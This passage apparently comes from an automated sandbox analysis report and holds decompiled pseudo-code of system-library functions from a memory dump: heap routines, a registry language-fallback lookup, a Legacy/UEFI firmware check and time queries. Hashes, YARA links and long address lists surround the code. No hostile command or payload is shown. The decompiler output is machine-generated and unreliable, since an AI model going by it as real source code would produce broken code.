                                                                                            0x04d354e6
                                                                                            0x04d354eb
                                                                                            0x04d354eb
                                                                                            0x04d354de
                                                                                            0x00000000
                                                                                            0x04d354bc
                                                                                            0x04d35477
                                                                                            0x04d3547a
                                                                                            0x04d35480
                                                                                            0x04d35483
                                                                                            0x04d35486
                                                                                            0x04d3548b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d3548b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d35447
                                                                                            0x04d35447
                                                                                            0x04d35447
                                                                                            0x04d35447
                                                                                            0x04d3544e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d35450
                                                                                            0x04d35452
                                                                                            0x04d35455
                                                                                            0x04d3545a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d3545c
                                                                                            0x04d3546a
                                                                                            0x04d3546d
                                                                                            0x04d3546f
                                                                                            0x00000000
                                                                                            0x04d3546f
                                                                                            0x04cde70f

                                                                                            Strings
                                                                                            • @, xrefs: 04CDE6C0
                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04CDE68C
                                                                                            • InstallLanguageFallback, xrefs: 04CDE6DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                            • API String ID: 0-1757540487
                                                                                            • Opcode ID: 6434261735f835146192316b9d3954696eb96cbe6eca721aaa62b521714351b1
                                                                                            • Instruction ID: 8a348321f6fafa2b095a3f76f90cdf901f3e0948e42475237d190d7d5b4e5cd9
                                                                                            • Opcode Fuzzy Hash: 6434261735f835146192316b9d3954696eb96cbe6eca721aaa62b521714351b1
                                                                                            • Instruction Fuzzy Hash: 3651D0B2608315ABD714DF24D450A6BB3E9BF88719F05092EF989D7210F734FA04C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D9E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 60%
                                                                                            			E04D9E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E04D9BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E04D9BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E04D9AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E04D19730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E04D9A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E04D9A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E04D19730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E04D9A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E04D9A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E04CF2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E04CEB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E04CEFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E04CF7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E04D8FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                            0x04d9e547
                                                                                            0x04d9e549
                                                                                            0x04d9e54f
                                                                                            0x04d9e553
                                                                                            0x04d9e557
                                                                                            0x04d9e55a
                                                                                            0x04d9e55c
                                                                                            0x04d9e55f
                                                                                            0x04d9e561
                                                                                            0x04d9e567
                                                                                            0x04d9e56b
                                                                                            0x04d9e7e2
                                                                                            0x00000000
                                                                                            0x04d9e571
                                                                                            0x04d9e575
                                                                                            0x04d9e577
                                                                                            0x04d9e57b
                                                                                            0x04d9e57c
                                                                                            0x04d9e57d
                                                                                            0x04d9e57e
                                                                                            0x04d9e57f
                                                                                            0x04d9e588
                                                                                            0x04d9e58f
                                                                                            0x04d9e591
                                                                                            0x04d9e592
                                                                                            0x04d9e592
                                                                                            0x04d9e596
                                                                                            0x04d9e59e
                                                                                            0x04d9e5a0
                                                                                            0x04d9e5a6
                                                                                            0x04d9e61d
                                                                                            0x04d9e61d
                                                                                            0x04d9e621
                                                                                            0x04d9e623
                                                                                            0x04d9e630
                                                                                            0x04d9e630
                                                                                            0x04d9e7e6
                                                                                            0x04d9e7eb
                                                                                            0x04d9e7ed
                                                                                            0x04d9e7f4
                                                                                            0x04d9e7fa
                                                                                            0x04d9e7ff
                                                                                            0x04d9e7ff
                                                                                            0x04d9e80a
                                                                                            0x04d9e812
                                                                                            0x04d9e812
                                                                                            0x04d9e5ab
                                                                                            0x04d9e5b4
                                                                                            0x04d9e5b9
                                                                                            0x04d9e5be
                                                                                            0x04d9e5c0
                                                                                            0x04d9e5c2
                                                                                            0x04d9e5c8
                                                                                            0x04d9e5c9
                                                                                            0x04d9e5cb
                                                                                            0x04d9e5cc
                                                                                            0x04d9e5d5
                                                                                            0x04d9e5e4
                                                                                            0x04d9e5f1
                                                                                            0x04d9e5f8
                                                                                            0x04d9e5f8
                                                                                            0x04d9e5d5
                                                                                            0x04d9e602
                                                                                            0x04d9e616
                                                                                            0x04d9e63d
                                                                                            0x04d9e644
                                                                                            0x04d9e64d
                                                                                            0x04d9e652
                                                                                            0x04d9e657
                                                                                            0x04d9e659
                                                                                            0x04d9e65b
                                                                                            0x04d9e661
                                                                                            0x04d9e662
                                                                                            0x04d9e664
                                                                                            0x04d9e665
                                                                                            0x04d9e66e
                                                                                            0x04d9e67d
                                                                                            0x04d9e68a
                                                                                            0x04d9e691
                                                                                            0x04d9e691
                                                                                            0x04d9e66e
                                                                                            0x04d9e6b0
                                                                                            0x00000000
                                                                                            0x04d9e6b6
                                                                                            0x04d9e6bd
                                                                                            0x04d9e6c7
                                                                                            0x04d9e6d7
                                                                                            0x04d9e6d9
                                                                                            0x04d9e6db
                                                                                            0x04d9e6de
                                                                                            0x04d9e6e3
                                                                                            0x04d9e6f3
                                                                                            0x04d9e6fc
                                                                                            0x04d9e700
                                                                                            0x04d9e700
                                                                                            0x04d9e704
                                                                                            0x04d9e70a
                                                                                            0x04d9e70a
                                                                                            0x04d9e713
                                                                                            0x04d9e716
                                                                                            0x04d9e719
                                                                                            0x04d9e720
                                                                                            0x04d9e761
                                                                                            0x04d9e76b
                                                                                            0x04d9e774
                                                                                            0x04d9e77a
                                                                                            0x04d9e77a
                                                                                            0x04d9e78a
                                                                                            0x04d9e791
                                                                                            0x04d9e799
                                                                                            0x04d9e79b
                                                                                            0x04d9e79f
                                                                                            0x04d9e7aa
                                                                                            0x04d9e7c0
                                                                                            0x04d9e7ac
                                                                                            0x04d9e7b2
                                                                                            0x04d9e7b9
                                                                                            0x04d9e7b9
                                                                                            0x04d9e7c7
                                                                                            0x04d9e806
                                                                                            0x00000000
                                                                                            0x04d9e7c9
                                                                                            0x04d9e7d1
                                                                                            0x04d9e7d8
                                                                                            0x00000000
                                                                                            0x04d9e7d8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9e722
                                                                                            0x04d9e72e
                                                                                            0x04d9e748
                                                                                            0x04d9e74c
                                                                                            0x04d9e754
                                                                                            0x04d9e756
                                                                                            0x04d9e75c
                                                                                            0x04d9e75c
                                                                                            0x00000000
                                                                                            0x04d9e75c
                                                                                            0x04d9e758
                                                                                            0x04d9e758
                                                                                            0x00000000
                                                                                            0x04d9e758
                                                                                            0x04d9e750
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9e752
                                                                                            0x00000000
                                                                                            0x04d9e752
                                                                                            0x04d9e730
                                                                                            0x04d9e735
                                                                                            0x04d9e73d
                                                                                            0x04d9e73f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9e741
                                                                                            0x04d9e741
                                                                                            0x00000000
                                                                                            0x04d9e741
                                                                                            0x04d9e739
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9e73b
                                                                                            0x00000000
                                                                                            0x04d9e73b
                                                                                            0x04d9e722
                                                                                            0x04d9e720
                                                                                            0x04d9e6b0
                                                                                            0x04d9e618
                                                                                            0x00000000
                                                                                            0x04d9e618

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `$`
                                                                                            • API String ID: 0-197956300
                                                                                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                            • Instruction ID: 2c2b07e34e82275d96545fefaef5e5c8df69819f2a5b952e8f5dbc7577f54bf9
                                                                                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                            • Instruction Fuzzy Hash: 54917972204341ABEB24CE65C845B6BB7E6BF84714F14892DF999CA2D0E774F904CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D551BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E04D551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x4db05f0);
				E04D2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E04CEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E04D553CA(0);
						return E04D2D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E04D1F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04CF3690(1, _t117, 0x4cb1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E04D1AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04CF4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E04D1AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E04D5500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04D19860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                            0x04d551be
                                                                                            0x04d551c3
                                                                                            0x04d551c8
                                                                                            0x04d551cd
                                                                                            0x04d551d0
                                                                                            0x04d551d3
                                                                                            0x04d551d8
                                                                                            0x04d551db
                                                                                            0x04d551de
                                                                                            0x04d551e0
                                                                                            0x04d551e3
                                                                                            0x04d551e6
                                                                                            0x04d551e8
                                                                                            0x04d55342
                                                                                            0x04d55351
                                                                                            0x04d55356
                                                                                            0x04d5535a
                                                                                            0x04d55360
                                                                                            0x04d55363
                                                                                            0x04d55366
                                                                                            0x04d55369
                                                                                            0x04d55369
                                                                                            0x04d5536b
                                                                                            0x04d5536b
                                                                                            0x04d55370
                                                                                            0x04d553a3
                                                                                            0x04d553a4
                                                                                            0x04d553a6
                                                                                            0x04d553ab
                                                                                            0x04d553ab
                                                                                            0x04d553ae
                                                                                            0x04d553ae
                                                                                            0x04d553b5
                                                                                            0x04d553bf
                                                                                            0x04d553bf
                                                                                            0x04d55375
                                                                                            0x04d55396
                                                                                            0x04d553a0
                                                                                            0x04d553a0
                                                                                            0x00000000
                                                                                            0x04d55396
                                                                                            0x04d55377
                                                                                            0x04d55379
                                                                                            0x04d5537f
                                                                                            0x04d5538c
                                                                                            0x04d55390
                                                                                            0x00000000
                                                                                            0x04d55390
                                                                                            0x04d551ee
                                                                                            0x04d551f1
                                                                                            0x04d55301
                                                                                            0x04d55310
                                                                                            0x04d55315
                                                                                            0x04d55318
                                                                                            0x04d5531b
                                                                                            0x04d55320
                                                                                            0x04d5532e
                                                                                            0x04d55331
                                                                                            0x00000000
                                                                                            0x04d55331
                                                                                            0x04d55328
                                                                                            0x04d55329
                                                                                            0x00000000
                                                                                            0x04d55329
                                                                                            0x04d551fa
                                                                                            0x04d55235
                                                                                            0x04d55236
                                                                                            0x04d55239
                                                                                            0x04d5523f
                                                                                            0x04d55240
                                                                                            0x04d55241
                                                                                            0x04d55242
                                                                                            0x04d55246
                                                                                            0x04d55247
                                                                                            0x04d5524e
                                                                                            0x04d55251
                                                                                            0x04d55267
                                                                                            0x04d55269
                                                                                            0x04d5526e
                                                                                            0x04d5527d
                                                                                            0x04d5527e
                                                                                            0x04d55281
                                                                                            0x04d55282
                                                                                            0x04d55287
                                                                                            0x04d55288
                                                                                            0x04d5528a
                                                                                            0x04d5528f
                                                                                            0x04d55294
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d5529a
                                                                                            0x04d5529c
                                                                                            0x04d5529e
                                                                                            0x04d5529e
                                                                                            0x04d552a4
                                                                                            0x04d552b0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d552ba
                                                                                            0x04d552bc
                                                                                            0x04d552bc
                                                                                            0x04d552d4
                                                                                            0x04d552d9
                                                                                            0x04d552dc
                                                                                            0x04d552e1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d552e7
                                                                                            0x04d552f4
                                                                                            0x00000000
                                                                                            0x04d552f4
                                                                                            0x04d55270
                                                                                            0x00000000
                                                                                            0x04d55270
                                                                                            0x04d551fc
                                                                                            0x04d551fd
                                                                                            0x04d55202
                                                                                            0x04d55203
                                                                                            0x04d55205
                                                                                            0x04d5520a
                                                                                            0x04d5520f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d5521b
                                                                                            0x04d55226
                                                                                            0x04d5522b
                                                                                            0x04d5521d
                                                                                            0x04d5521d
                                                                                            0x04d55222
                                                                                            0x04d55222
                                                                                            0x04d5522d
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: Legacy$UEFI
                                                                                            • API String ID: 2994545307-634100481
                                                                                            • Opcode ID: 52e006827bfa33b5b17340918141ebebe1638c85a026f8d206b200fe520fa67f
                                                                                            • Instruction ID: 82b846d2dcb2985fd87a5191e888f6e26053e1e379d09c625f2a62458ca21671
                                                                                            • Opcode Fuzzy Hash: 52e006827bfa33b5b17340918141ebebe1638c85a026f8d206b200fe520fa67f
                                                                                            • Instruction Fuzzy Hash: F7518171E00608AFEF26DFA8E950AADB7F5FF48704F54402DE949EB265DA71E900CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CFB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 76%
                                                                                            			E04CFB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4dcd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04CF7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04DA8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04D19E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04D1B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04D1CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04CF7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04DA8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04D1AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4dc8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4dc862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4dc8628; // 0x0
							_t116 =  *0x4dc862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                            0x04cfb94c
                                                                                            0x04cfb956
                                                                                            0x04cfb95c
                                                                                            0x04cfb95e
                                                                                            0x04cfb964
                                                                                            0x04cfb969
                                                                                            0x04cfb96d
                                                                                            0x04cfb96d
                                                                                            0x04cfb970
                                                                                            0x04cfb974
                                                                                            0x04cfb97a
                                                                                            0x04cfbadf
                                                                                            0x04cfbadf
                                                                                            0x04cfbae2
                                                                                            0x04cfbae4
                                                                                            0x04cfbae6
                                                                                            0x04cfbaf0
                                                                                            0x04d42cb8
                                                                                            0x04cfbaf6
                                                                                            0x04cfbaf6
                                                                                            0x04cfbaf6
                                                                                            0x04cfbafd
                                                                                            0x04cfbb1f
                                                                                            0x04cfbb1f
                                                                                            0x04cfbaff
                                                                                            0x04cfbb00
                                                                                            0x04cfbb00
                                                                                            0x04cfbb03
                                                                                            0x04cfbb03
                                                                                            0x04cfbacb
                                                                                            0x04cfbacf
                                                                                            0x04cfbad0
                                                                                            0x04cfbad1
                                                                                            0x04cfbadc
                                                                                            0x04cfbadc
                                                                                            0x04cfb980
                                                                                            0x04cfb980
                                                                                            0x04cfb988
                                                                                            0x04cfb98b
                                                                                            0x04cfb98d
                                                                                            0x04cfb990
                                                                                            0x04cfb993
                                                                                            0x04cfb999
                                                                                            0x04cfb99b
                                                                                            0x04cfb9a1
                                                                                            0x04cfb9a5
                                                                                            0x04cfb9aa
                                                                                            0x04cfb9b0
